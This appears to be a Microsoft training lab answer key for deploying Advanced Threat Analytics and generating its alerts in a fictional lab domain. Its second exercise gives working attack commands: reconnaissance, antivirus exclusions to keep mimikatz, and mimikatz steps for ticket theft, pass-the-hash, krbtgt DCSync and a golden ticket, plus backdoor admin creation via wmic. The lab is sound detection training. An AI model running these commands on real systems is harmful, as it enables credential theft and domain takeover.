# Lab Answer Key:  Microsoft Security Workshop: Improving Detection
# Lab 2: Deploying and Using Microsoft Advanced Threat Analytics (ATA)

## Exercise 1: Deploying Microsoft ATA

#### Task 1: Installing Microsoft ATA on a Windows Server 2016 domain member server (LON-SVR1)

1.   Sign in to the LON-SVR1 lab virtual machine with the following credentials:

  -   Username: **ADATUM\\Administrator**
  -   PASSWORD: **Pa55w.rd**

2.   From LON-SVR1, start Internet Explorer and browse to the Microsoft Advanced Threat Analytics page of the Microsoft Evaluation Center site at https://www.microsoft.com/en-us/evalcenter/evaluate-microsoft-advanced-threat-analytics.
3.   On the Microsoft Advanced Threat Analytics page, provide your contact information and click **Continue**.
4.   In the **Start your evaluation** section, click **Download** to download the **ATA1.9.iso** file.
5.   When prompted, click **Save**. This will save the ISO file in the Downloads folder. The download should take about a minute.
6.   Click **Open folder**. This will open File Explorer displaying the content of the Downloads folder. 
7.   Double-click the ISO file. This will mount the ISO file as the **E:** drive. 
8.   In File Explorer, on the **E:** drive, double click **Microsoft ATA Center Setup**. This will start the setup wizard.
9.   On the initial page of the wizard, select **English** in the drop-down list and click **Next**.
10.   On the **Accept the Microsoft Software License Terms** page, click the checkbox **I accept the Microsoft Software License Terms**, and then click **Next**.
11.   On the **Use Microsoft Update to help keep your computer secure** page, click the option **I don't want to use Microsoft Update** and click Next. 
12.   On the **Configure the Center** page, accept the default installation and database paths, leave the checkbox **Create self-signed certificate** enabled, and click **Install**.

  > **Note:**  This is the certificate that is used by the ATA Console and ATA Center service. In a production environment, you would use a certificate issued by a trusted Certification Authority.

13.   Wait for the installation to complete. This should about 2 minutes. Once the installation completes successfully, click **Launch**. This will open an Internet Explorer page.

  > **Note:**  The setup process will install the following components:
  -   ATA Center service
  -   Mongo DB
  -   Custom Performance Monitor data collection set
  -   self-signed certificates 

14.   On the newly opened Internet Explorer page, note the message referring to the certificate of the website, and click **Continue to this website (not recommended)**. This will display the **Welcome to Microsoft Advanced Threat Analytics** page.

  > **Note:**  The reason for the message is the mismatch between the URL (which uses localhost) and the subject name of the certificate (ATACenter). To remediate this, you will create a CNAME DNS record that points ATACenter.adatum.com to LON-SVR1.adatum.com and then replace localhost with ATACenter in the target URL.

15.   Connect to LON-DC1 and sign in with the following credentials: 

  -   Username: **ADATUM\\Administrator**
  -   Pasword: **Pa55w.rd**

16.   On LON-DC1, click **Start**, in the **Start** menu, click **Windows Administrative Tools** and then click **DNS**.
17.   In the DNS Manager console, navigate to the **Adatum.com** forward lookup zone.
18.   Right-click **Adatum.com** and, in the right-click menu, click **New Alias (CNAME)**.
19.   In the **New Resource Record** dialog box, specify the following settings and click **OK**:

  -   Alias name (uses parent domain if left blank): **ATACenter**
  -   Fully qualified domain name (FQDN): ATACenter.adatum.com
  -   Fully qualified domain name (FQDN) for target host: LON-SVR1.adatum.com
  -   Allow any authenticated user to update all DNS records with the same name. This setting applies only to DNS records for a new name: leave the checkbox cleared


#### Task 2: Connecting ATA to Active Directory

1.   From the console session on LON-DC1, while you are signed as **ADATUM\\Administrator**, in the **Windows Administrative Tools** folder, click **Active Directory Administrative Center**.
2.   In Active Directory Administrative Center, click **Adatum (local)** in the tree pane on the left hand side, in the details pane in the center of the console, right-click **IT**, in the right click menu click **New** and then in the expanding menu on the right hand side click **User**.
3.   In the **Create User** window, specify the following settings and click **OK**:
  -   Full name: **ATAUser**
  -   User UPN Logon: **atauser@Adatum.com**
  -   User SamAccountName logon: **Adatum\\ATAUser**
  -   Pasword: **Pa55w.rd**
  -   Confirm password: **Pa55w.rd**
  -   Password options: **Password never expires** and **User cannot change password**
  -   Create in: **OU=IT,DC=Adatum,DC=com**
4.   Switch to the console session on LON-SVR1. On the **Welcome to Microsoft Advanced Threat Analytics** page, in the **Directory Services** pane, specify the following and click **Test connection**:
  -   Username: **ATAUser**
  -   Password: **Pa55w.rd**
  -   Domain: **adatum.com**
  -   Single level domain: make sure that this checkbox is cleared
5.   Make sure that the test connection was successful and then click **Save**.

#### Task 3: Installing the ATA Lightweight Gateway on a Windows Server 2016 domain controller (LON-DC1)

1.   From the **Welcome to Microsoft Advanced Threat Analytics** page of the **ATA Center** console on LON-SVR1, click the **Download Gateway Setup** link. This will redirect you to the **Gateways** page. 
2.   On the **Gateway** page, click **Gateway Setup** to download the ATA Gateway setup files.
3.   When prompted whether to open or save **Microsoft ATA Gateway Setup.zip**, click **Save**. This will download the file to the **Downloads** folder. 
4.   Click **Start**, in the **Start** menu, right-click **Windows PowerShell**, click **More**, and click **Run as administrator**.
5.   From the **Administrator: Windows PowerShell** console, run:

```
Copy-Item -Path "$env:userprofile\Downloads\Microsoft ATA Gateway Setup.zip" -Destination '\\LON-DC1\C$\UTIL\'
```

6.   Switch to the console session on LON-DC1 and start File Explorer.
7.   In the File Explorer window, navigate to the **C:\UTIL** folder, right-click **Microsoft ATA Gateway Setup.zip**, and click **Extract All**. 
8.   In the **Extract Compressed (Zipped) Folders, in the **File will be extracted to this folder** text box, type **C:\UTIL** and click **Extract**.
9.   Double-click **Microsoft ATA Gateway Setup.exe** file in the **C:\UTIL** folder. This will start the **ATA Gateway setup** wizard.
10.   On the **Welcome** page, accept the default language and click **Next**.
11.   On the **Gateway deployment type** page, note the message indicating the gateway type. The message might also indicate that the domain controller does not meet the minimum hardware requirements for the Lightweight Gateway. You can ignore it in the lab environment. Click **Next**.
12.   On the **Configure the Gateway** page, accept the default installation path and click **Install**.
13.   Wait until installation completes. This should take less than a minute.
14.   Once installation completes successfully, click **Finish**.
15.   Switch to the console session on LON-SVR1. On the **Gateways** page, verify that the **LON-DC1** entry appears with the value **Lightweight Gateway** in the **TYPE** column and the **Running** **SERVICE STATUS**. 

  > **Note:**  You might need to wait a few minutes before the **SERVICE STATUS** change from **Starting** to **Running**.

16.   Click the **LON-DC1** entry and review the **ATA Lightweight Gateway** settings. Note that it is configured by default to captures traffic on the local Ethernet network adapter. It is also not configured as the domain synchronizer candidate.
17.   In the **LON-DC** window, turn the **Domain synchronizer candidate** setting to **ON** and click **Save**.

> **Result**: After completing this exercise, you will have deployed ATA Center and ATA Lightweight Gateway in the lab environment. 

## Exercise 2: Using Microsoft ATA for Threat Detection

#### Task 1: Detecting DNS Reconnaissance

1.   Switch to the console of LON-CL1 and sign in to the LON-CL1 Windows 10 Professional lab virtual machine with the following credentials:

  -   Username: **ADATUM\\Administrator**
  -   Pasword: **Pa55w.rd**

2.   Right-click **Start** and click **Windows PowerShell (Admin)**.
3.   From the **Administrator: Windows PowerShell** prompt, run the following:

```
Add-LocalGroupMember –Group Administrators –Member ADATUM\Ida
```

4.   Click **Start**, click the avatar icon, and click **Switch account**. On the sign-in screen, click **Other user** and enter the following credentials:

  -   Username: **ADATUM\\Ida**
  -   Pasword: **Pa55w.rd**

5.   Once you logged on as **ADATUM\\Ida** to LON-CL1, right-click **Start** and click **Windows PowerShell (Admin)**. When prompted, in the **User Account Control** dialog box, click **Yes**.
6.   In the **Administrator: Windows PowerShell** window, run the following:

```
nslookup
ls –d adatum.com
exit
```

7.   From LON-CL1, click **Start**, in the **Start** menu, expand the **Windows Accessories** folder, and click **Internet Explorer**
8.   If prompted, select the option **Use recommended security and compatibility settings** and click **OK**. 
9.   In the Internet Explorer window, browse to https://ATACenter
10.   In the Internet Explorer window, on the **This site is not secure** page, click **More information** and then click **Go on to the webpage (not recommended)**.
11.   In the Internet Explorer window, click **Certificate error** in the address bar and then click **View certificates**.
12.   In the **Certificate** dialog box, click **Install Certificate**. This will start **Certificate Import Wizard**.
13.   On the **Welcome to the Certificate Import Wizard** page, click **Local Machine** and then click **Next**. When prompted, in the **User Account Control** dialog box, click **Yes**.
14.   On the **Certificate Store** page, click **Place all certificates in the following store** and then click **Browse**.
15.   In the **Select Certificate Store** dialog box, select **Trusted root Certification Authorities** and click **OK**.
16.   Back on the **Certificate Store** page, click **Next**. 
17.   On the **Completing the Certificate Import Wizard** page, click **Finish**.
18.   In the **Certificate Import Wizard** message box, click **OK**.
19.   In the **Certificate** dialog box, click **OK**.
20.   Close Internet Explorer, re-open it, and browse again to https://ATACenter
21.   Note the message **IDA does not have permissions to access this page** and click **Switch user**. 
22.   In the **Windows Security** dialog box, type the following and click **OK**:

  -   Username: **ADATUM\\Administrator**
  -   Pasword: **Pa55w.rd**

23.   You will be automatically redirected to the **Health** page of the **ATA Center** console. You should see a single alert labeled **Reconnaissance using DNS** representing your attempt to perform a DNS zone transfer to LON-CL1 (which is not a DNS server) from LON-DC1.
24.   Click the **Reconnaissance using DNS** label. This will display details of the event. Examine the displayed information. Click to the right of the **OPEN** label and note that you have the options to close the alert, suppress the alert, close alert and exclude LON-CL1 from future alerts, download details of the alert, share it via email, and delete the alert. 
25.   Click the back arrow icon in the upper left corner of Internet Explorer to return to the listing of the alerts.

#### Task 2: Detecting Remote Execution

1.   On LON-CL1, click **Start**, in the **Start** menu, click the avatar icon, and then click **ADATUM\\Administrator Signed in**.
2.   On the sign-in screen, in the **Password** text box, type **Pa55w.rd** and press **Enter** to sign in as **ADATUM\\Administrator**.
3.   Click **Start**, in the **Start** menu, expand the **Windows Accessories** folder, and click **Internet Explorer**. If prompted, select the option **Use recommended security and compatibility settings** and click **OK**. 
4.   In Internet Explorer, browse to the PsTools download page at https://docs.microsoft.com/en-us/sysinternals/downloads/pstools and click **Download PsTools Suite**. 
5.   When prompted, click **Save**.
6.   Once the download completes, click **Open folder**. This will open **File Explorer**.
7.   In the File Explorer window, right-click **PSTools.zip** and click **Extract All**.
8.   In the **Extract Compressed (Zipped) Folders** dialog box, in the **Files will be extracted to this folder** text box, type **C:\UTIL** and click **Extract**.
9.   Right-click **Start** and click **Windows PowerShell (Admin)**. 
10.   From the **Administrator: Windows PowerShell** window, run the following:

```
C:\UTIL\Psexec.exe –accepteula \\lon-dc1 cmd
```

11.   From the **Administrator: Windows PowerShell** window, run the following:

```
hostname
```

12.   Verify that the current hostname is LON-DC1. To close the remote session, from the **Administrator: Windows PowerShell** window, run the following:

```
exit
```

13.   On LON-CL1, click **Start**, in the **Start** menu, click the avatar icon, and then click **ADATUM\\Ida Signed in**.
14.   On the sign-in screen, in the **Password** text box, type **Pa55w.rd** and press **Enter** to sign in as **ADATUM\\Ida**.
15.   In the Internet Explorer window displaying the **Health** page of the ATA Center console, you should see another alert labeled **Remote execution attempt detected** representing the remote session on LON-DC1 from LON-CL1.
16.   Click the **Remote execution attempt detected** label. This will display details of the event. Examine the displayed information.
17.   Click the back arrow icon in the upper left corner of Internet Explorer to return to the listing of the alerts. 

#### Task 3: Enumerating NetBIOS sessions to a remote computer

1.   On LON-CL1, click **Start**, in the **Start** menu, click the avatar icon, and then click **ADATUM\\Administrator Signed in**.
2.   On the sign-in screen, in the **Password** text box, type **Pa55w.rd** and press **Enter** to sign in as **ADATUM\\Administrator**.
3.   From the **Administrator: Windows PowerShell** window, run the following:

```
net use * \\lon-dc1\Sysvol
```

4.   On LON-CL1, click **Start**, in the **Start** menu, click the avatar icon, and then click **ADATUM\\Ida Signed in**.
5.   On the sign-in screen, in the **Password** text box, type **Pa55w.rd** and press **Enter** to sign in as **ADATUM\\Ida**.
6.   From LON-CL1, click **Start**, in the **Start** menu, expand the **Windows Accessories** folder, and click **Internet Explorer**
7.   In the Internet Explorer window, browse to http://www.joeware.net/freetools/tools/netsess/index.htm
8.   On the **Netsess** page, click **Download Now**.
9.   When prompted, click **Save**.
10.   Once the download completes, click **Open folder**. This will open **File Explorer**.
11.   In the File Explorer window, right-click **NetSess.zip** and click **Extract All**.
12.   In the **Extract Compressed (Zipped) Folders** dialog box, in the **Files will be extracted to this folder** text box, type **C:\UTIL** and click **Extract**.
13.   From the **Administrator: Windows PowerShell** window, run the following:

```
C:\UTIL\NetSess.exe lon-dc1.adatum.com
```

14.   Review the results and note that they include the NetBIOS session established by **ADATUM\\Administrator** from the same computer (LON-CL1 with the IP address of 172.16.0.102).
15.   Switch to the Internet Explorer window displaying the **Health** page of the ATA Center console. You should see another alert labeled **Reconnaissance using SMB Session Enumeration** representing execution of NetSess.exe.

  > **Note:** You might need to wait a few minutes before this entry appears on the Health page

16.   Click the **Reconnaissance using SMB Session Enumeration** label. This will display details of the event that resulted in the alert. Examine the displayed information, including the exposed accounts.
17.   Click the back arrow icon in the upper left corner of Internet Explorer to return to the listing of the alerts.

#### Task 4: Carrying out an Pass-the-Ticket exploit

1.   On LON-CL1, click **Start**, in the **Start** menu, click the avatar icon, and then click **ADATUM\\Administrator Signed in**.
2.   On the sign-in screen, in the **Password** text box, type **Pa55w.rd** and press **Enter** to sign in as **ADATUM\\Administrator**.
3.   From the **Administrator: Windows PowerShell** window, run the following:

```
dir \\lon-dc1.adatum.com\c$
```

  > **Note:** This command will generate a Kerberos ticket for **ADATUM\\Administrator**, which you will next steal as **ADATUM\\Ida**. 

4.   On LON-CL1, click **Start**, in the **Start** menu, click the avatar icon, and then click **ADATUM\\Ida Signed in**.
5.   On the sign-in screen, in the **Password** text box, type **Pa55w.rd** and press **Enter** to sign in as **ADATUM\\Ida**.
6.   On LON-CL1, from the **Administrator: Windows PowerShell** window, run the following:

```
net user administrator /domain
```

7.   Click **Microsoft Edge** icon in the taskbar. 
8.   In the Microsoft Edge window, browse to https://github.com/gentilkiwi/mimikatz/releases , right-click the entry representing the most recent version of **mimikatz_trunk.zip** and click **Save target as**.
9.   In the **Save As** dialog box, click **Save**.
10.   Note that Windows Defender Antivirus will automatically identify the file as containing a virus and delete it.
11.   Click **Start** and, in the **Start** menu, click **Windows Defender Security Center**.
12.   In the **Windows Defender Security Center** window, click **Virus & threat protection**, then click **Virus & threat protection settings**, and then click **Exclusions**.
13.   Click **Add or remove exclusions**, click the plus sign next to the **Add an exclusion** label and click **Folder**.
14.   In the **Select Folder** dialog box, type **C:\Users\Ida\Downloads** and then click **Select Folder**.
15.   When prompted, in the **User Account Control** dialog box, click **Yes**.
16.   Repeat the steps 8-10 to add the **C:\UTIL** folder to the list of exclusions
to the local **Downloads** folder. 
17.   Switch back to the Microsoft Edge window and, on https://github.com/gentilkiwi/mimikatz/releases page, right-click the entry representing the most recent version of **mimikatz_trunk.zip** and click **Save target as**.
18.   In the **Save As** dialog box, click **Save**.
19.   Once the downloads completes, click **Open folder**. 
20.   In the File Explorer window, right-click **mimikatz_trunk.zip** and click **Extract All**.
21.   In the **Extract Compressed (Zipped) Folders** dialog box, in the **Files will be extracted to this folder** text box, type **C:\UTIL** and click **Extract**.
22.   Click **Start**, in the **Start** menu, expand the **Windows System** folder, right click **Command Prompt**, click **More**, and then click **Run as administrator**. When prompted, in the **User Account Control** dialog box, click **Yes**.
23.   From the **Administrator: Command Prompt** window, run the following:

```
cd C:\UTIL\x64
```

24.   From the **Administrator: Command Prompt** window, run the following:

```
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
```

25.   This will dump each individual Kerberos ticket in the local cache into separate .kirbi files in the C:\\UTIL folder. You are interested only in those associated with the **ADATUM\\Administrator** account. In this task, you will test the **Pass-the-Ticket** functionality by validating access to the default administrative share of LON-DC1, so you’ll use only the relevant **CIFS** ticket. To copy the relevant tickets to the **C:\\UTIL\\Tickets** subfolder, from the **Administrator: Command Prompt** window, run the following: 

```
robocopy . C:\UTIL\Tickets *Administrator@cifs-lon-dc1.adatum.com.kirbi
```

26.   Now to execute a **Pass-the-Ticket** attack, from the **Administrator: Command Prompt** window, run the following:

```
mimikatz.exe "privilege::debug" "kerberos::ptt c:\UTIL\Tickets" "exit"
```

27.   To validate that the **Pass-the-Ticket** exploit was successful, from the **Administrator: Command Prompt** window, run the following:

```
klist
```

28.   Verify that the output includes the ticket of the **ADATUM\\Administrator** account. Another way to validate the outcome of the exploit is to enumerate content of the default administrative share on the domain controller LON-DC1. To accomplish this, from the **Administrator: Command Prompt** window, run the following:

```
dir \\lon-dc1.adatum.com\c$
```

29.   Ensure that the command returns the listing of the content of the C: drive on LON-DC1.

  > **Note:** ATA postpones generation of the Identity theft using pass-the-ticket attack alert so you will not be able to observe it in this lab. This delay is intended to lower the false positive rate of the Pass-the-Ticket alerts. 


#### Task 5: Carrying out an Pass-the-Hash exploit

1.   On LON-CL1, while signed on as **ADATUM\\Ida**, from the **Administrator: Command Prompt** window, run the following:

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > task5.txt
```

2.   From the **Administrator: Command Prompt** window, run the following:

```
notepad task5.txt
```

3.   Review the content of the file in Notepad and note the entries corresponding to the **ADATUM\\Administrator** account. While they do not include the clear text password (that entry should be null), they do contain the NTLM hash. Copy the value of the hash into Clipboard. 
4.   From the **Administrator: Command Prompt** window, run the following as a single command (make sure to replace the placeholder `<hash_value>` with the value of the NTLM hash you copied into Clipboard):

```
Mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /ntlm:<hash_value> /domain:adatum.com" "exit"
```

5.   This will open a new Command Prompt window. From the newly opened Command Prompt window, run the following:

```
whoami
```

6.   Note that you are still operating as the **ADATUM\\Ida**. Now, in the same Command Prompt window, run the following:

```
dir \\lon-dc1.adatum.com\c$
```

7.   Note that you are able to list the content of the default administrative share on the domain controller, which implies that you are operating as a member of the domain local Administrators group. Now that you have administrative privileges to the domain controller, you will create a new user account and add it to the domain local Administrators group. To accomplish this, in the same Command Prompt window, run the following:

```
wmic /node:"lon-dc1" process call create "net user /add user01 Pa55w.rd"
wmic /node:"lon-dc1" process call create "net localgroup Administrators user01 /add"
```

8.   To verify that the commands have been completed successfully, in the same Command Prompt window, run the following:

```
net localgroup administrators /domain
```

9.   Switch to the Internet Explorer window displaying the **Health** page of the ATA Center console. You should see another alert labeled **Remote execution attempt detected** representing the commands you ran from the Command Prompt in this task.

10.   Click the **Remote execution attempt detected** label. This will display details of the event. Examine the displayed information. 
11.   Click the back arrow icon in the upper left corner of Internet Explorer to return to the listing of the alerts.


#### Task 6: Establishing Domain Dominance by compromising KRBTGT credentials and generating Golden Ticket

1.   On LON-CL1, while signed on as **ADATUM\\Ida**, from the same Command Prompt window that you invoked via mimikatz in the previous task, run the following:

```
C:\UTIL\x64\mimikatz.exe "lsadump::dcsync /domain:adatum.com /user:krbtgt" "exit" > C:\UTIL\x64\task6a.txt
```

2.   From the **Administrator: Command Prompt** window, run the following:

```
notepad C:\UTIL\x64\task6a.txt
```

3.   Review the content of the file in Notepad and note the entries corresponding to the **ADATUM\\krbtgt** account. While they do not include the clear text password, they do contain the NTLM hash. Copy the value of the hash into Clipboard. 
4.   Switch to the Internet Explorer window displaying the **Health** page of the ATA Center console. You should see another alert labeled **Malicious replication of directory services** representing the command you ran from the Command Prompt on LON-CL1.
5.   Click the **Malicious replication of directory services** label. This will display details of the event. Examine the displayed information. 
6.   To generate Golden Ticket, you need to identify the SID of the adatum.com domain. You can accomplish this by using the **whomi** command with the **//user** switch. In the same Command Prompt window which you invoked via mimikatz in the previous task, run the following:

```
whoami /user
```

7.   In the **SID** column, note the SID value excluding the last dash (-) and the trailing four digits. This represents the SID of the adatum.com domain. Copy this value into Clipboard.
8.   In the same Command Prompt window, run the following, while making sure to replace the `<hash_value>` placeholder with the value of the NTLM hash availble from Notepad and the `<domain_sid>` placeholder with the value of the domain SID you copied into Clipboard:

```
C:\UTIL\x64\mimikatz.exe "privilege::debug" "kerberos::golden /domain:adatum.com /sid:<domain_sid> /krbtgt:<hash_value> /user:Administrator /id:500
/groups:512,513,518,519,520 /ticket:admin.kirbi" "exit"

```

9.   Verify that the ticket has been generated. The ticket includes group membership in Domain Admins (512), Domain Users (513), Schema Admins (518), Enterprise Admins (519) and Group Policy Creator Owners (520). Note that the lifetime of the ticket is 10 years.
10.   To test the usage of the Golden Ticket, click **Start**, in the **Start** menu, expand the **Windows System** folder, right click **Command Prompt**, click **More**, and then click **Run as administrator**. When prompted, in the **User Account Control** dialog box, click **Yes**.
11.   From the newly opened **Administrator: Command Prompt** window, run the following to verify that you (operating in the security context of **ADATUM\\Ida** account) currently do not have administrative access to the domain controller:

```
dir \\lon-dc1.adatum.com\c$
```

12.   Ensure that the command returns the Access is denied message.
13.   To load the Golden Ticket you generated, from the **Administrator: Command Prompt** window, run the following:

```
C:\UTIL\x64\mimikatz.exe "privilege::debug" "kerberos::ptt admin.kirbi" "exit"
```

14.   From the **Administrator: Command Prompt** window, run the following to verify that you (operating in the security context of **ADATUM\\Ida** account) now have administrative access to the domain controller:

```
dir \\lon-dc1.adatum.com\c$
```

15.   Ensure that the command returns the listing of the content of the C: drive on LON-DC1.

  > **Note:** ATA will generate a Kerberos Golden Ticket activity alert once the Golden Ticket is used again in more than 10 hours after its creation (since 10 hours is the lifetime of a regular Kerberos ticket).  

  > **Result**: After completing this exercise, you have used ATA for threat detection.

©2016 Microsoft Corporation. All rights reserved.

The text in this document is available under the [Creative Commons Attribution 3.0 License](https://creativecommons.org/licenses/by/3.0/legalcode "Creative Commons Attribution 3.0 License"), additional terms may apply.  All other content contained in this document (including, without limitation, trademarks, logos, images, etc.) are **not** included within the Creative Commons license grant.  This document does not provide you with any legal rights to any intellectual property in any Microsoft product. You may copy and use this document for your internal, reference purposes.

This document is provided "as-is." Information and views expressed in this document, including URL and other Internet Web site references, may change without notice. You bear the risk of using it. Some examples are for illustration only and are fictitious. No real association is intended or inferred. Microsoft makes no warranties, express or implied, with respect to the information provided here.

  